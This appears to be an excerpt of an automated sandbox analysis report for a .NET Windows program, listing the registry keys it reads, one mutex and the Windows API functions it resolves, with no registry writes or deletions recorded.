HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B21A317C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
kernel32.dll.QueryActCtxW
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptDestroyKey
kernel32.dll.GetFullPathNameW
kernel32.dll.GetVersionExW
mscorjit.dll.getJit
kernel32.dll.GetCurrentProcess
kernel32.dll.GetCurrentThread
kernel32.dll.DuplicateHandle
kernel32.dll.GetCurrentThreadId
ole32.dll.OleInitialize
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
ole32.dll.CoRegisterMessageFilter
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
kernel32.dll.GetExitCodeProcess
kernel32.dll.SetProcessWorkingSetSize
kernel32.dll.GetUserDefaultUILanguage
bcrypt.dll.BCryptGetFipsAlgorithmMode
cryptsp.dll.CryptAcquireContextW
